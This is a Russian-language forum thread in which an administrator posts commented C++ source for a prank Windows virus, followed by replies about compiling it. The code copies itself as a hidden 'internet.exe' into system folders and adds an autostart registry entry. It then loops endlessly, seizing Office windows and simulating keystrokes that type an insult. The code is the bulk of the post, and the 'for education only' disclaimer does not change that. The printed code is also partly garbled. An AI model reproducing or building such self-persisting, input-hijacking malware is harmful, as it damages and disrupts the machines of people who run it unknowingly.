Исходник вируса на C++. Вирус для MS Word

Тема в разделе "Исходники вирусов", создана пользователем X-Shar, 12 июн 2012.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.809
    Симпатии:
    427
    Пол:
    Мужской
    Репа:
    +961 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Шутка с MS Word. Сейчас по шагам распишем, как устроен этот шутник.

    Код:
    // Подключаем библиотеки и создаем основные переменные.

    #include <windows.h>
    #include <iostream.h>

    WINAPI WinMain(HINSTANCE hintHINSTANCE hPrevInstanceLPSTR lpCmdLineint nCmdShow)
    {
    HKEY key;
    char sysdir[256],
    windir[256],
    myname[256];

    /*Узнаем свое имя функцией GetModuleFileName. И узнает адрес папки windows и папки system32 функциями GetWindowsDirectory и GetSystemDirectory*/

    GetModuleFileName(hint,myname,256);
    GetWindowsDirectory(windir,sizeof(windir));
    GetSystemDirectory(sysdir,sizeof(sysdir));

    /*Добавляем к строкам содержащим пути к системным папкам имя нашего вируса, чтобы скопировать в эти папки себя.*/

    strcat(windir,"\\internet.exe");
    strcat(sysdir,"\\internet.exe");

    //Копируемся и ставим себе скрытые атрибуты

    CopyFile(myname,windir,FALSE);
    CopyFile(myname,sysdir,FALSE);
    SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN);
    SetFileAttributes(sysdir,FILE_ATTRIBUTE_HIDDEN);

    //Прописываемся в реестр на автозагрузку

    RegOpenKeyEx(HKEY_LOCAL_MACHINE"Software\\Microsoft\\Windows\\CurrentVersion\\Run"0,KEY_WRITE, &key);
    RegSetValueEx(key,"internet.exe",0,REG_SZ,(BYTE *)sysdir,256);
    RegCloseKey(key);

    //Ожидаем 2 минуты. Зачем не знаю:)

    Sleep(60000*2); //Две минуты

    /*Запускаем бесконечный цикл каждые 10 секунд. В цикле ищем окна содержащие в своих заголовках Microsoft Word, Microsoft Excel,Microsoft PowerPoint. Максимизируем окно, переключаем раскладку клавиатуры на русскую и эмулируем нажатие на несколько клавиш. В результате в окне пользователя в WORD сам по себе печатается текст "Вы ламер".*/

    int k=0;
    do
    {
    if (
    FindWindow(NULL"Microsoft Word")!=|| FindWindow(NULL"Microsoft Excel")!=|| FindWindow(NULL"Microsoft PowerPoint")!=0)
    {
    ShowWindow(FindWindow(NULL"Microsoft Word") , SC_MAXIMIZE);
    LoadKeyboardLayout("00000419"KLF_ACTIVATE);
    Sleep(10000);
    do
    {
    keybd_event('D'0,0,0);
    keybd_event('D'0,KEYEVENTF_KEYUP,0);
    keybd_event('S'0,0,0);
    keybd_event('S'0,KEYEVENTF_KEYUP,0);
    keybd_event(VK_SPACE0,0,0);
    keybd_event(VK_SPACE0,KEYEVENTF_KEYUP,0);
    keybd_event('K'0,0,0);
    keybd_event('K'0,KEYEVENTF_KEYUP,0);
    keybd_event('F'0,0,0);
    keybd_event('F'0,KEYEVENTF_KEYUP,0);
    keybd_event('V'0,0,0);
    keybd_event('V'0,KEYEVENTF_KEYUP,0);
    keybd_event('T'0,0,0);
    keybd_event('T'0,KEYEVENTF_KEYUP,0);
    keybd_event('H'0,0,0);
    keybd_event('H'0,KEYEVENTF_KEYUP,0);
    }while(
    1);
    }
    }while(
    1);
    }
    Вот и весь вирус-шутник. Вся информация предоставлена исключительно для ознакомления и не может расцениваться как руководство к написанию вредоносных программ. Исходники оригинального вируса были найдены в сети интернет и комментированны мной в целях повышение уровня знаний пользователей при борьбе с вирусами.
     
    Последнее редактирование: 2 дек 2015
    • Мне нравится Мне нравится x 7
  2. BlackForce Пользователь
    BlackForce
    Ответить в чате

    Первый уровень

    Регистрация:
    08.11.2014
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    Что-то не компилируется
     
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.809
    Симпатии:
    427
    Пол:
    Мужской
    Репа:
    +961 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    А какую ошибку выдаёт ?

    Надеюсь не пытались полностью скопипастить, ибо код несовсем правильный...Dmeh-Smeh-Smeh!!!
     
  4. BlackForce Пользователь
    BlackForce
    Ответить в чате

    Первый уровень

    Регистрация:
    08.11.2014
    Сообщения:
    2
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    Все, разобрался, в студии надо было многобайтовую кодировку поставить в настройках проекта :)
     
  5. VLaSSoNee Пользователь
    VLaSSoNee
    Ответить в чате

    Первый уровень

    Регистрация:
    24.03.2015
    Сообщения:
    1
    Симпатии:
    0
    Репа:
    +0 / 0 / -0
    Не пойму что он делает
     
  6. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.809
    Симпатии:
    427
    Пол:
    Мужской
    Репа:
    +961 / 152 / -29
    Jabber:
    Skype:
    ICQ:

    638294628

    Печатает в ворде "Вы ламер" !
     
    • Смешно Смешно x 1
  7. oxygen36 Пользователь
    oxygen36
    Ответить в чате

    Первый уровень

    Регистрация:
    06.04.2015
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
    Все нормально компилится. ручки прямые надо)
     
  8. semen18 Пользователь
    semen18
    Ответить в чате

    Первый уровень

    Регистрация:
    06.05.2015
    Сообщения:
    1
    Симпатии:
    0
    Репа:
    +0 / 0 / -0
    хм
     
  9. ms5624 Пользователь
    ms5624
    Ответить в чате

    Первый уровень

    Регистрация:
    09.06.2015
    Сообщения:
    1
    Симпатии:
    0
    Репа:
    +0 / 0 / -0
    Кто нибудь пробовал его улучшать дальше?
     
  10. ameter Пользователь
    ameter
    Ответить в чате

    Первый уровень

    Регистрация:
    12.06.2015
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0

Поделиться этой страницей